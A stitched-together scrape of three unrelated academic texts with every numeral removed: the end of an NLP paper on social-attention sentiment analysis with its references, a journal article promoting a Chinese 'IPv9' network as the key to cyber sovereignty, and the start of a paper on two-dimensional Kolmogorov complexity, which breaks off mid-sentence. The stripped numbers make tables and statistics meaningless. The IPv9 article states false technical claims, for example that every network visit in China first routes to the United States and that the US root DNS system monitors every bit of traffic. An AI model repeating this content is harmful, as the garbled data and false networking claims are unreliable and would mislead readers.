examples containing some of these words are shown in table . . sentiment analysis of product reviews the labeled datasets for twitter sentiment analysis are relatively small; to evaluate our method on a larger dataset, we utilize a product review dataset by tang et al. ( ). the dataset consists of , reviews written by , users crawled from a popular product review sites, ciao. the rating information in discrete five-star range is avail- able for the reviews, which is treated as the ground truth label information for the reviews. moreover, the users of this site can mark explicit “trust” rela- tionships with each other, creating a social network. to select examples from this dataset, we first re- moved reviews that were marked by readers as “not useful.” we treated reviews with more than three stars as positive, and less than three stars as nega- tive; reviews with exactly three stars were removed. http://www.ciao.co.uk dataset # author # positive # negative # review train ciao , , , , dev ciao , , , test ciao , , , , total , , , , table : statistics of the ciao product review datasets. system test ciao cnn . mixture of experts . random attention . * concatenation . social attention . ** table : average f score on the ciao test set. the best results are in bold. results are marked with * and ** if they are significantly better than cnn and random atten- tion respectively, at p < . . we then sampled , reviews from this set, and split them randomly into training ( %), develop- ment ( %) and test sets ( %). the statistics of the resulting datasets are presented in table . we utilize , trust relations between , ciao users to train the author embeddings. we consider the , most frequent words in the datasets, and assign them pretrained word vec embeddings. as shown in table , the datasets have highly skewed class distributions. thus, we use the average f score of positive and negative classes as the evalu- ation metic. the evaluation results are presented in table . the best hyperparameters are generally the same as those for twitter sentiment analysis, except that the optimal number of basis models is , and the op- timal number of pretraining epochs is . mixture of experts and concatenation obtain slightly worse f scores than the baseline cnn system, but ran- dom attention performs significantly better. in con- trast to the semeval datasets, individual users of- ten contribute multiple reviews in the ciao datasets (the average number of reviews from an author is . ; table ). as an author tends to express similar opinions toward related products, random attention https://code.google.com/archive/p/ word vec is able to leverage the personalized information to improve sentiment analysis. prior work has inves- tigated the direction, obtaining positive results us- ing speaker adaptation techniques (al boni et al., ). finally, by exploiting the social network of trust relations, social attention obtains further improvements, outperforming random attention by a small but significant margin. related work domain adaptation and personalization do- main adaptation is a classic approach to handling the variation inherent in social media data (eisen- stein, ). early approaches to supervised do- main adaptation focused on adapting the classifier weights across domains, using enhanced feature spaces (daumé iii, ) or bayesian priors (chelba and acero, ; finkel and manning, ). 
re- cent work focuses on unsupervised domain adap- tation, which typically works by transforming the input feature space so as to overcome domain dif- ferences (blitzer et al., ). however, in many cases, the data has no natural partitioning into do- mains. in preliminary work, we constructed social network domains by running community detection algorithms on the author social network (fortunato, ). however, these algorithms proved to be un- stable on the sparse networks obtained from social media datasets, and offered minimal performance improvements. in this paper, we convert social net- work positions into node embeddings, and use an attentional component to smooth the classification rule across the embedding space. personalization has been an active research topic in areas such as speech recognition and information retrieval. standard techniques for these tasks include linear transformation of model parameters (legget- ter and woodland, ) and collaborative filter- ing (breese et al., ). these methods have re- cently been adapted to personalized sentiment anal- ysis (tang et al., a; al boni et al., ). su- pervised personalization typically requires labeled training examples for every individual user. in con- trast, by leveraging the social network structure, we can obtain personalization even when labeled data is unavailable for many authors. sentiment analysis with social relations previ- ous work on incorporating social relations into sen- timent classification has relied on the label consis- tency assumption, where the existence of social con- nections between users is taken as a clue that the sentiment polarities of the users’ messages should be similar. speriosu et al. ( ) construct a hetero- geneous network with tweets, users, and n-grams as nodes. each node is then associated with a senti- ment label distribution, and these label distributions are smoothed by label propagation over the graph. similar approaches are explored by hu et al. ( ), who employ the graph laplacian as a source of reg- ularization, and by tan et al. ( ) who take a fac- tor graph approach. a related idea is to label the sentiment of individuals in a social network towards each other: west et al. ( ) exploit the sociolog- ical theory of structural balance to improve the ac- curacy of dyadic sentiment labels in this setting. all of these efforts are based on the intuition that indi- vidual predictions p(y) should be smooth across the network. in contrast, our work is based on the in- tuition that social neighbors use language similarly, so they should have a similar conditional distribu- tion p(y | x). these intuitions are complementary: if both hold for a specific setting, then label consis- tency and linguistic consistency could in principle be combined to improve performance. social relations can also be applied to improve personalized sentiment analysis (song et al., ; wu and huang, ). song et al. ( ) present a latent factor model that alleviates the data sparsity problem by decomposing the messages into words that are represented by the weighted sentiment and topic units. social relations are further incorporated into the model based on the intuition that linked in- dividuals share similar interests with respect to the latent topics. wu and huang ( ) build a person- alized sentiment classifier for each author; socially connected users are encouraged to have similar user- specific classifier components. 
as discussed above, the main challenge in personalized sentiment analy- sis is to obtain labeled data for each individual au- thor. both papers employ distant supervision, using emoticons to label additional instances. however, emoticons may be unavailable for some authors or even for entire genres, such as reviews. further- more, the pragmatic function of emoticons is com- plex, and in many cases emoticons do not refer to sentiment (walther and d’addario, ). our ap- proach does not rely on distant supervision, and as- sumes only that the classification decision function should be smooth across the social network. conclusion this paper presents a new method for learning to overcome language variation, leveraging the ten- dency of socially proximate individuals to use lan- guage similarly—the phenomenon of linguistic ho- mophily. by learning basis models that focus on different local regions of the social network, our method is able to capture subtle shifts in meaning across the network. inspired by ensemble learn- ing, we have formulated this model by employing a social attention mechanism: the final prediction is the weighted combination of the outputs of the ba- sis models, and each author has a unique weight- ing, depending on their position in the social net- work. our model achieves significant improvements over standard convolutional networks, and ablation analyses show that social network information is the critical ingredient. in other work, language varia- tion has been shown to pose problems for the entire nlp stack, from part-of-speech tagging to informa- tion extraction. a key question for future research is whether we can learn a socially-infused ensemble that is useful across multiple tasks. acknowledgments we thank duen horng “polo” chau for discus- sions about community detection and ramon as- tudillo for sharing data and helping us to reproduce the nlse results. this research was supported by the national science foundation under award ri- , by the national institutes of health un- der award number r gm - , and by the air force office of scientific research. the content is solely the responsibility of the authors and does not necessarily represent the official views of these sponsors. references mohammad al boni, keira qi zhou, hongning wang, and matthew s gerber. . model adaptation for personalized opinion analysis. in proceedings of the association for computational linguistics (acl). ramon f astudillo, silvio amir, wang ling, mário silva, and isabel trancoso. . learning word rep- resentations from scarce and noisy data with embed- ding sub-spaces. in proceedings of the association for computational linguistics (acl). aiti aw, min zhang, juan xiao, and jian su. . a phrase-based statistical model for sms text normaliza- tion. in proceedings of the association for computa- tional linguistics (acl). justin basilico and thomas hofmann. . unify- ing collaborative and content-based filtering. in pro- ceedings of the international conference on machine learning (icml). john blitzer, ryan mcdonald, and fernando pereira. . domain adaptation with structural correspon- dence learning. in proceedings of empirical methods for natural language processing (emnlp). su lin blodgett, lisa green, and brendan o’connor. . demographic dialectal variation in social me- dia: a case study of african-american english. in pro- ceedings of empirical methods for natural language processing (emnlp). antoine bordes, nicolas usunier, alberto garcia-duran, jason weston, and oksana yakhnenko. . 
trans- lating embeddings for modeling multi-relational data. in neural information processing systems (nips). john s breese, david heckerman, and carl kadie. . empirical analysis of predictive algorithms for collab- orative filtering. in proceedings of uncertainty in ar- tificial intelligence (uai). john bryden, sebastian funk, and vincent jansen. . word usage mirrors community structure in the online social network twitter. epj data science, ( ). ciprian chelba and alex acero. . adaptation of maximum entropy capitalizer: little data can help a lot. computer speech & language, ( ). hal daumé iii. . frustratingly easy domain adapta- tion. in proceedings of the association for computa- tional linguistics (acl). penelope eckert and sally mcconnell-ginet. . lan- guage and gender. cambridge university press. jacob eisenstein, brendan o’connor, noah a. smith, and eric p. xing. . a latent variable model for geographic lexical variation. in proceedings of empirical methods for natural language processing (emnlp). jacob eisenstein. . what to do about bad language on the internet. in proceedings of the north american chapter of the association for computational linguis- tics (naacl). jacob eisenstein. . systematic patterning in phonologically-motivated orthographic variation. journal of sociolinguistics, . marcello federico. . bayesian estimation methods for n-gram language model adaptation. in proceed- ings of international conference on spoken language (icslp). jenny r. finkel and christopher manning. . hier- archical bayesian domain adaptation. in proceedings of the north american chapter of the association for computational linguistics (naacl). john l fischer. . social influences on the choice of a linguistic variant. word, . santo fortunato. . community detection in graphs. physics reports, ( ). lisa j. green. . african american english: a lin- guistic introduction. cambridge university press. aric a. hagberg, daniel a schult, and p swart. . exploring network structure, dynamics, and function using networkx. in proceedings of the th python in science conferences (scipy). matthias hagen, martin potthast, michael büchner, and benno stein. . webis: an ensemble for twitter sentiment detection. in proceedings of the th inter- national workshop on semantic evaluation. hussam hamdan, patrice bellot, and frederic bechet. . lsislif: feature extraction and label weighting for sentiment analysis in twitter. in proceedings of the th international workshop on semantic evaluation. dirk hovy. . demographic factors improve classifi- cation performance. in proceedings of the association for computational linguistics (acl). xia hu, lei tang, jiliang tang, and huan liu. . ex- ploiting social relations for sentiment analysis in mi- croblogging. in proceedings of web search and data mining (wsdm). bernardo huberman, daniel m. romero, and fang wu. . social networks that matter: twitter under the microscope. first monday, ( ). robert a jacobs, michael i jordan, steven j nowlan, and geoffrey e hinton. . adaptive mixtures of local experts. neural computation, ( ). jing jiang and chengxiang zhai. . instance weight- ing for domain adaptation in nlp. in proceedings of the association for computational linguistics (acl). nal kalchbrenner, edward grefenstette, and phil blun- som. . a convolutional neural network for mod- elling sentences. in proceedings of the association for computational linguistics (acl). yoon kim. . convolutional neural networks for sentence classification. 
in proceedings of empirical methods for natural language processing (emnlp). diederik kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint arxiv: . . william labov. . the social motivation of a sound change. word, ( ). yann lecun, bernhard boser, john s denker, donnie henderson, richard e howard, wayne hubbard, and lawrence d jackel. . backpropagation applied to handwritten zip code recognition. neural computa- tion, ( ). christopher j leggetter and philip c woodland. . maximum likelihood linear regression for speaker adaptation of continuous density hidden markov mod- els. computer speech & language, ( ). wang ling, chris dyer, alan black, and isabel trancoso. . two/too simple adaptations of word vec for syntax problems. in proceedings of the north ameri- can chapter of the association for computational lin- guistics (naacl). miller mcpherson, lynn smith-lovin, and james m cook. . birds of a feather: homophily in social networks. annual review of sociology. preslav nakov, zornitsa kozareva, alan ritter, sara rosenthal, veselin stoyanov, and theresa wilson. . semeval- task : sentiment analysis in twitter. in proceedings of the th international work- shop on semantic evaluation. mark ej newman. . the structure and function of complex networks. siam review, ( ). sara rosenthal and kathleen mckeown. . age pre- diction in blogs: a study of style, content, and online behavior in pre- and post-social media generations. in proceedings of the association for computational lin- guistics (acl). sara rosenthal, preslav nakov, svetlana kiritchenko, saif m mohammad, alan ritter, and veselin stoy- anov. . semeval- task : sentiment analy- sis in twitter. in proceedings of the th international workshop on semantic evaluation. aliaksei severyn and alessandro moschitti. . unitn: training deep convolutional neural network for twitter sentiment classification. in proceedings of the th international workshop on semantic evaluation. xuehua shen, bin tan, and chengxiang zhai. . im- plicit user modeling for personalized search. in pro- ceedings of the international conference on informa- tion and knowledge management (cikm). kaisong song, shi feng, wei gao, daling wang, ge yu, and kam-fai wong. . personalized senti- ment classification based on latent individuality of mi- croblog users. in proceedings of the th interna- tional joint conference on artificial intelligence (ij- cai). michael speriosu, nikita sudan, sid upadhyay, and ja- son baldridge. . twitter polarity classification with label propagation over lexical links and the fol- lower graph. in proceedings of empirical methods for natural language processing (emnlp). r. sproat, a.w. black, s. chen, s. kumar, m. osten- dorf, and c. richards. . normalization of non- standard words. computer speech & language, ( ). chenhao tan, lillian lee, jie tang, long jiang, ming zhou, and ping li. . user-level sentiment anal- ysis incorporating social networks. in proceedings of knowledge discovery and data mining (kdd). jiliang tang, huiji gao, and huan liu. . mtrust: discerning multi-faceted trust in a connected world. in proceedings of web search and data mining (wsdm). duyu tang, furu wei, bing qin, ming zhou, and ting liu. . building large-scale twitter-specific senti- ment lexicon: a representation learning approach. in proceedings of the international conference on com- putational linguistics (coling). duyu tang, bing qin, and ting liu. a. 
learning se- mantic representations of users and products for docu- ment level sentiment classification. in proceedings of the association for computational linguistics (acl). jian tang, meng qu, mingzhe wang, ming zhang, jun yan, and qiaozhu mei. b. line: large-scale in- formation network embedding. in proceedings of the conference on world-wide web (www). mike thelwall. . homophily in myspace. journal of the american society for information science and technology, ( ). matt thomas, bo pang, and lillian lee. . get out the vote: determining support or opposition from congressional floor-debate transcripts. in proceed- ings of empirical methods for natural language pro- cessing (emnlp). peter trudgill. . linguistic change and diffusion: description and explanation in sociolinguistic dialect geography. language in society, ( ). joseph b. walther and kyle p. d’addario. . the impacts of emoticons on message interpretation in computer-mediated communication. social science computer review, ( ). zhen wang, jianwen zhang, jianlin feng, and zheng chen. . knowledge graph embedding by trans- lating on hyperplanes. in proceedings of the national conference on artificial intelligence (aaai). robert west, hristo paskov, jure leskovec, and christo- pher potts. . exploiting social network structure for person-to-person sentiment analysis. transactions of the association for computational linguistics, . caroline winterer. . where is america in the re- public of letters? modern intellectual history, ( ). fangzhao wu and yongfeng huang. . personal- ized microblog sentiment classification via multi-task learning. in proceedings of the national conference on artificial intelligence (aaai). paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , ipv is the foundation of the future digital world lou peide . china mobile communication federation . beijing university of posts and telecommunications beijing, , china e-mail: @ .com xu fei . state and provincial joint engineering lab. of advanced network, monitoring and control, china . school of computer science and engineering xi'an technological university, xi'an , china e-mail: china @qq.com abstract—the share of the network economy has already accounted for % of china's gdp, and its importance is self- evident. the two biggest problems involved in the network are network sovereignty and broadband charges, and the sovereignty of cyberspace is the "life gate" of the network. china’s cyber sovereignty is subject to the united states, resulting in political oppression, security, and economic exploitation. therefore, without cyber sovereignty, there would be no national security without cyber security. ipv has become the key to china's acquisition of network sovereignty. it is not only a technological innovation, but also related to national security and various cost savings, and can realize the autonomy and control of the network. keywords-ipv component; ipv ; cyberspace sovereignty; digital china i. introduction i am very glad to share a topic with you, that is, to see the network foundation of digital china from the "life gate" of the internet. why are we talking about this? you know, everybody's life cannot leave the network and we surf the internet every day. now the internet economy has accounted for % of the gdp, the importance of the internet becomes more and more prominent, so the basic work related to the internet becomes even more important. there are two biggest problems. 
one is the issue of cyber sovereignty: it is necessary to find out whose web we are on. obviously, it is the american internet. that is why president xi has said he wants to uphold cyber sovereignty; but how we assert our sovereignty over the internet is still a challenge. the second problem is that premier li keqiang asked the operators to raise speeds and lower charges, reducing the cost of internet access for the majority of small and medium-sized enterprises; but how to reduce the bandwidth cost of internet access is a difficult problem. what are the reasons for the difficulty of solving these two major problems? we will look at them one by one and describe the solutions we have.
ii. the definition of cyberspace
first, it is very important to have a definition of cyberspace. how can we assert sovereignty over cyberspace when it is not even properly defined in the media right now? we think it needs to be properly defined. cyberspace is a virtual space with three basic elements, a combination of the virtual and the real dominated by the virtual:
a. the physical infrastructure of network transmission (all kinds of routers, servers and switches; national backbone optical cable and satellite transmission systems; local cable and wireless user networks, including mobile communication networks, the nb-iot internet of things, idc, etc.);
b. data communication technology standards and protocols, together with the full root domain name resolution service system;
c. the application environment and users (including the various terminals with their chips and software, application standards, tens of thousands of service contents, hundreds of millions of users, etc.).
iii. cyberspace sovereignty
the most important leading position in this virtual cyberspace is held not by the infrastructure or the application environment but by the entire root system. this has to be clear; if it is not, a lot of the explanations will go awry. the leading core of cyberspace sovereignty is the data communication technology standards and protocols (currently the ipv and ipv of the world's existing equipment, plus the future network / ipv , i.e., three generations of network data communication standards and protocols), together with the resulting distribution of the network address space and its resolution. specifically, whoever masters the core assets of cyberspace, namely the primary root and mother root servers, the root name servers, and the ip addresses, asset equipment and operational management rights of the address and domain name resolution system, masters the sovereignty of cyberspace. therefore we have to state very clearly what cyberspace sovereignty is. the working principle of the current public network is not thoroughly understood, and this is actually very important, because it determines how cyberspace sovereignty can be upheld; it is determined by the basic principles. any time we access the network, from any computer or mobile phone, we must first access the root server system: the root system contains the mother root server and the primary root server (the publishing host), and only the root name servers can access and maintain this hidden publishing host. the root domain name servers read the primary root server first, then the mother root server, and then obtain the data, which is then read by the mirror servers and spread to the entire network.
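the resolution chain just described can be seen directly with an ordinary dns query. the following is a minimal, illustrative python sketch (ours, not part of the original article) using the third-party dnspython package; the address used is that of a.root-servers.net, and in practice a resolver usually reaches a nearby anycast mirror or a local cache rather than the root itself.

import dns.message
import dns.query
import dns.rdatatype

# a.root-servers.net; anycast mirrors and local caches usually answer in practice
ROOT_SERVER_IP = "198.41.0.4"

# ask a root name server where to find example.com
query = dns.message.make_query("example.com.", dns.rdatatype.A)
response = dns.query.udp(query, ROOT_SERVER_IP, timeout=5)

# the root does not answer the question itself; it returns a referral
# to the .com name servers, which a resolver then queries in turn
for rrset in response.authority:
    print(rrset)

iterating this referral step down the hierarchy (root, then the top-level domain servers, then the zone's own servers) is the chain the article describes; mirror and cache servers only shorten it.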
any network visit in the country first goes to the united states. some people say that many of our visits do not go abroad, and indeed some businesses temporarily feel that they do not; in fact the mirror root servers and cache servers are doing the work. the internet's mirror root servers in china are completely controlled from the united states. commonly used urls can be parsed locally and data can be cached locally to prevent network congestion; however, the parent root of the internet can back up the entire network, and traffic can still go out even though most of the data traffic is domestic. this is why the united states can monitor the world through the internet, and, for economic reasons, the data traffic to the root system is billed two-way. comparing china's total telecom business revenue for january of this year with the revenue of internet and related services and of carrier telecommunications suggests that a large part of the difference may be two-way traffic charges for renting access to the internet. another set of data makes the same point: china's international export bandwidth has grown in step with the country's total information consumption, while the combined income of internet companies and operators often accounts for less than half of that total. therefore, the more the network economy develops, the greater the contribution to the united states, and the more our security is restricted by the united states. since every network visit goes abroad, huge traffic flows to the united states, the united states charges us both ways, and the money is taken away by others; yet most of our visits are in fact domestic, so the traffic that goes out is wasted, and more than half of our information consumption could actually be saved. why has premier li keqiang's call for operators to increase bandwidth and lower charges proved so difficult to achieve? because the basic working principles of the internet have determined this.
iv. the "life gate" of the internet
president xi jinping clearly pointed out in his speech: "the core technology of the internet is our biggest 'life gate', and the fact that core technology is controlled by others is our biggest hidden danger." the key is how to interpret what president xi jinping meant by the "life gate" and by core technology being controlled by others. most of chinese society, across all walks of life, has misread this, or has read it only selectively. in fact, at the second world internet conference in wuzhen, president xi put forward the "four principles and five propositions" for the first time; the first principle is to uphold network sovereignty, and that is the "life gate". at present the taproot of the ipv /ipv internet, the mother root server and the root name servers are mainly researched, developed, controlled and operated by the united states, so what we call the chinese internet is in reality access to a network whose sovereignty belongs to the united states. access is governed by a contract signed at the beginning of each year (a contract governed by california law), access to the internet is ruled by the root name server system, and a huge sum is spent every year on wholesale leases of addresses, amounting to billions of dollars for effective ipv and ipv addresses. dns and routing addressing are controlled abroad, the nation's public data are forced to travel through pacific cables and to accept comprehensive monitoring by the root domain name system (the root system can monitor every bit under every ip address), and we will always face the danger of being taken offline (the us congress has granted the president of the united states the right to cut off the network, partially or completely, in another country). the root system is the internet's "life gate" in the strict sense. the real core technology of the internet is the entire root domain name service system and the corresponding network standard system and intellectual property system that can form network sovereignty. at present china's cyber sovereignty is subject to others, causing political oppression, monitored security and economic exploitation; this is the biggest hidden danger for china as a sovereign, independent country (national sovereignty spans five territories: sea, land, air, space and cyberspace; china currently faces challenges from the united states at sea, on land and in the air, but cyberspace has been completely invaded). therefore we put forward the point that without cyber security there is no national security, and we should add that without cyber sovereignty there is no cyber security and hence no national security, because the whole framework of network information security can be divided into three levels:
a. encrypted information. information security of the various businesses at the network application layer, including virus killing, trojan prevention, firewall reinforcement and active defense against network attacks. the vast majority of chinese network security companies work on this kind of information security, which is mainly supported by encryption technology; once it is targeted by capable hackers, information leakage and decryption is only a matter of time.
b.
network core equipment and terminals. network core equipment and terminals lack a core "soul": the cpu core chips, operating systems and databases come from the major american vendors (the so-called "eight guardian warriors"), so the information on such devices is transparent to those vendors and to the nsa. some people now directly treat china's lack of core chips and operating systems, a supply-chain issue, as the "life gate" of network development; that is also reasonable, but the "life gate" still has an overall aspect and a local aspect, a biggest and a next-biggest difference.
c. lack of cyber sovereignty. the loss of sovereignty makes the network information security problem an overall one. we are the world's largest body of users accessing the united states' internet, and every bit under every communication ip address is monitored by the us internet root system. all data can be sent from china via pacific cables, as determined by the us internet root system, to the us national security agency for big data analysis and inspection, and then stored and archived; the information is decrypted according to the specific situation. moreover, in the internet world it has become the prerogative of the president of the united states to be able to cut off all, part, or certain ip addresses of a country. this is the greatest danger encountered by the data communication infrastructure in the construction of digital china and the digital economy in the new era. it is like building houses on the foundation of other people's walls: no matter how big and beautiful they are, they may be vulnerable to wind and rain or even a single blow. this most important information security problem, caused by the lack of network sovereignty, is not mentioned in the media. when the plan for the xiong'an new area requires every manhole cover and every tree in xiong'an to have an ip address (apparently an ipv address of the us internet), we are all afraid and sweat on our backs. in view of the fact that the strategic struggle between china and the united states has entered a new and grim state, we believe that it is time to address this issue, and we must do so.
v. development of ipv in china
in order to change the seriously passive strategic situation of china's cyberspace, to defend china's cyber sovereignty, and to build a new generation of domestic sovereign network that is independent, controllable and secure, the relevant ministries and commissions of the state council and the cpc central committee have already made important arrangements. china's ministry of industry and information technology formally established the "decimal network standard working group". during a collective study session of the political bureau of the cpc central committee, general secretary hu jintao stressed that "we must build, utilize and manage the new generation of internet well, with a positive attitude and an innovative spirit". president xi jinping, then a member of the standing committee of the political bureau of the cpc central committee and vice president of the cpc central party school, organized and completed the strategic research report on "accelerating the promotion and application of china's new-generation internet of independent innovation". the ministry of information industry officially defined ipv as the new generation internet, to distinguish ipv from the next generation internet.
in february the state council issued a notice on the national medium- and long-term plan for the construction of major scientific and technological infrastructure. among the key future-network test facilities to be built during the five-year plan period, it pointed out that the internet based on the tcp/ip protocol, relying on ever-increasing bandwidth and gradual improvement, cannot meet the needs of future development, and that test facilities should be built to break through the basic theory of the future network and support new-generation internet experiments. the future network facilities mainly include an original network equipment system, a resource monitoring and management system, and an open network test system covering cloud computing services, internet applications, spatial information network simulation, network information security, high-performance integrated circuit verification and quantum communication networks. it is therefore obviously incorrect for some network academicians to define the future network as "an intelligent network expressway to be built on the basis of the existing network architecture"; in fact, those experts are responsible for the intelligent routing of china's access network, which is controlled by the internet in the united states. the "naming and addressing" and "security" parts at the core of the future network international standards officially released by iso/iec in december are led by chinese experts, and china holds the core intellectual property rights. the future network has a clear and distinct definition, and major countries including the united states, russia, canada and south korea voted in favor. in june the ministry of industry and information technology released the relevant industry standards for nationwide implementation of ipv (the sj/t series). this marks that, after years of hard struggle, the chinese government has begun construction using its independently developed and mature mother-root, primary-root and n-z named root name server system, together with core backbone routers and user routers with independent intellectual property rights, and really holds network sovereignty over the world's second internet, one that is independent of the united states yet compatible with the existing computer communication network of the internet. at present the ipv national backbone network already covers major cities such as beijing, shanghai and hangzhou, and thanks to the ipv -compatible characteristics of ipv networks, ipv network services can cover the whole country and even the whole world. china's network "life gate" can finally be held in the hands of the chinese themselves. the claim by some academicians that "ipv is a private network that can only be used domestically and cannot be internationalized" is also incorrect. under the guidance of the government, enterprises will play the leading role in promoting the commercial application and industrial development of the ipv next-generation internet in civil areas such as government and provincial- and ministerial-level websites, so as to build a community with a shared future in cyberspace.
at the same time, for the new generation of internet, the future network documents require accelerating the construction of the national future network test facilities and other major scientific research infrastructure, actively developing tests and application demonstrations of new network technologies and applications, significantly enhancing independent innovation capability in network information technology, and forming a first-mover advantage in future network technology. the relevant central documents also make clear that the application field of ipv is limited to the civil market outside government networks; government networks and important industries such as finance, electric power, energy, customs, taxation and health care, whose infrastructure information applications involve state sovereignty, must use our sovereign network in order to fundamentally ensure the safety of network information. ipv has now carried out extensive, large-scale demonstration experiments in these areas in china, covering military, government, finance, electricity, medical and health care, e-commerce and smart cities. today the china-led future network/ipv (compatible with ipv /ipv , covering china and reaching the world) participated in the theme report of the "one belt, one road" park construction international cooperation summit hosted by china enterprise news group, and the actual working system was demonstrated on site. this demonstration shows that, relying on the compatibility of ipv , any existing user can use a dual-stack user router (with a large number of independent effective communication addresses), and existing fixed, mobile and satellite networks can access the ipv backbone core network, so as to quickly reach the whole of china and then the global development goals. everyone is welcome to visit and offer guidance. the main features of the future network/ipv are:
1) the master and n-z root systems, the domain name resolution system, and the backbone and user routers of the future network/ipv are all independently developed and produced by china, including the core network of the ipv system independently built and operated by china.
2) ipv is compatible with ipv /ipv and supports existing ipv services.
3) to ensure data security, public network data is no longer subject to the control of the us internet and no longer travels across the ocean to hand data over to the united states, which is both safer and saves substantial network access costs. the bottom layer of the network itself adds security mechanisms that ipv /ipv do not have: addresses can be encrypted, communication can be verified first, and ipv supports vpn private networks for secure data communication.
4) high-speed broadband and controllable routing; the future network/ipv tcp/ip/m protocol can support imax and china's giant-screen urban cinema film distribution.
5) research and development of the linux "unicorn" operating system with ipv /ipv kernel support, and of a firefox browser with ipv /ipv kernel support, have been completed.
6) the network address space is extremely rich and can encode location and industry category. the future network/ipv has an enormous address space, and network addresses no longer need to be leased from the united states, which greatly reduces social costs and allows customers to build various kinds of their own regional and industry networks that are secure and controllable, reducing network congestion and transmission costs, which is especially important for the construction of a smart society and digital china.
7) digital asset management: the functions are powerful, an enormous number of addresses can be used to manage digital assets, and this can support the construction of china's sovereign digital currency.
8) the party, government, military and other special industries should continue to move off the united states' ipv /ipv internet and vigorously develop the domestic, independent, safe and controllable ipv network.
looking ahead to market development in cyberspace over the next five to ten years:
1) in the ordinary civil domestic market, ipv , ipv and ipv can develop freely.
2) in the general international market, including the "one belt, one road" overseas market, a situation of free competition among ipv , ipv and ipv can also be promoted.
3) the future network/ipv is an important foundation of the future iso/iec future network standards and the core foundation of the future digital world and digital china, creating a community with a shared future in cyberspace. the future network/ipv can not only meet the global demand for communication addresses for many years to come, but is also an important tool for digital asset management and an important carrier for the issuance of national sovereign digital currency. we are full of confidence in the future development of china's future network/ipv next-generation internet.
mr. lou was born in jiangsu province. he is mainly engaged in research on mobile multimedia information terminals and mobile information technology, industrial policy, and mobile digital media arts and technology. he has received the science and technology advancement awards of the ministry of electronics industry and of shanghai, a national invention award, a national invention exhibition gold award, an international invention exhibition silver award, the top-ten distinguished young teacher award of sichuan province, and the sichuan province youth science and technology award. he was a member of the optical fiber communication expert group of the national telecom subject of a key state project, director of the wireless division of the telecom production department of the mei, and director of the telecom division of the electronic information product management department of the mii. he promoted and planned the implementation of national mobile communication industry special projects and made great efforts toward the establishment and development of china's domestic mobile handset industry. mr. lou is executive secretary-general of the china mobile communications association and director of the standardization technical committee for multimedia communication and broadcasting of the china association for standardization.
references
[1] xie jianping et al. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn patent zl.
[2] xie jianping et al. method of using whole digital code to assign address for computer [p]. us patent.
[3] internet standard: internet protocol, darpa internet program protocol specification, rfc.
[4] s. deering, r. hinden, network working group. internet protocol, version (ipv ) specification, rfc.
[5] m. crawford, network working group. transmission of ipv packets over ethernet networks, rfc.
[6] j. onions, network working group. a historical perspective on the usage of ip version 9, rfc.
[7] v. cerf, network working group. a view from the 21st century, rfc.
[8] xie jianping, xu dongmei, et al. digital domain name specification, sj/t.
[9] information technology - future network - problem statement and requirements - part: naming and addressing, iso/iec dtr.
[10] wang wenfeng, xie jianping, et al. product and service digital identification format for information processing, sj/t.
two-dimensional kolmogorov complexity and an empirical validation of the coding theorem method by compressibility
hector zenil, fernando soler-toscano, jean-paul delahaye and nicolas gauvrit. affiliations: unit of computational medicine, department of medicine solna, scilifelab (science for life laboratory), centre for molecular medicine and karolinska institute, stockholm, sweden; department of computer science, university of oxford, uk; grupo de lógica, lenguaje e información, universidad de sevilla, spain; cristal (centre de recherche en informatique, signal et automatique de lille), france; chart lab, école pratique des hautes etudes, paris, france; algorithmic nature group, labores, paris, france. corresponding author: hector zenil, hectorz@labores.eu. academic editor: mikael skoglund. peerj computer science, distributed under a creative commons cc-by license.
abstract: we propose a measure based upon the fundamental theoretical concept in algorithmic information theory that provides a natural approach to the problem of evaluating n-dimensional complexity by using an n-dimensional deterministic turing machine. the technique is interesting because it provides a natural algorithmic process for symmetry breaking, generating complex n-dimensional structures from perfectly symmetric and fully deterministic computational rules, and producing a distribution of patterns as described by algorithmic probability. algorithmic probability also elegantly connects the frequency of occurrence of a pattern with its algorithmic complexity, hence effectively providing estimations of the complexity of the generated patterns. experiments to validate estimations of algorithmic complexity based on these concepts are presented, showing that the measure is stable in the face of some changes in computational formalism and that results are in agreement with those obtained using lossless compression algorithms when both methods overlap in their range of applicability. we then use the output frequency of the set of 2-dimensional turing machines to classify the algorithmic complexity of the space-time evolutions of elementary cellular automata.
subjects: computational biology, artificial intelligence, theory and formal methods. keywords: algorithmic complexity, algorithmic probability, kolmogorov-chaitin complexity, algorithmic information theory, cellular automata, solomonoff-levin universal distribution, information theory, dimensional complexity, image complexity, small turing machines.
introduction
the question of natural measures of complexity for objects other than strings and sequences, in particular measures suited to 2-dimensional objects, is an important open problem in complexity science, with potential applications to molecule folding, cell distribution, artificial life and robotics. here we provide a measure based upon the fundamental
theoretical concept that provides a natural approach to the problem of evaluating n-dimensional algorithmic complexity by using an n-dimensional deterministic turing machine, popularized under the term of turmites for n = 2, of which the so-called langton's ant is an example of a turing-universal turmite. a series of experiments to validate estimations of kolmogorov complexity based on these concepts is presented, showing that the measure is stable in the face of some changes in computational formalism and that results are in agreement with those obtained using lossless compression algorithms when both methods overlap in their range of applicability. we also present a divide-and-conquer algorithm that we call the block decomposition method (bdm) and apply it to the classification of images and space-time evolutions of discrete systems, providing evidence of the soundness of the method as a complementary alternative to compression algorithms for the evaluation of algorithmic complexity. we provide exact numerical approximations of the kolmogorov complexity of small square image patches, with the bdm allowing scalability to larger 2-dimensional arrays and even greater dimensions. the challenge of finding and defining 2-dimensional complexity measures has been identified as an open problem of foundational character in complexity science (feldman & crutchfield; shalizi, shalizi & haslinger). indeed, for example, humans understand 2-dimensional patterns in a way that seems fundamentally different from 1-dimensional ones (feldman). these measures are important because current 1-dimensional measures may not be suitable for 2-dimensional patterns in tasks such as quantitatively measuring the spatial structure of self-organizing systems. on the one hand, the application of shannon's entropy and kolmogorov complexity has traditionally been designed for strings and sequences; however, n-dimensional objects may have structure only distinguishable in their natural dimension and not in lower dimensions. this is indeed a question related to the loss of information in dimensionality reduction (zenil, kiani & tegnér, in press). a few measures of 2-dimensional complexity have been proposed before, building upon shannon's entropy and block entropy (feldman & crutchfield; andrienko, brilliantov & kurths), mutual information and minimal sufficient statistics (shalizi, shalizi & haslinger), and in the context of anatomical brain mri analysis (young et al.; young & schuff). a more recent application, also in the medical context and related to a measure of consciousness, uses lossless compressibility for eeg brain image analysis (casali et al.). on the other hand, for kolmogorov complexity, the common approach to evaluating the algorithmic complexity of a string has been to use lossless compression algorithms, because the length of a lossless compression is 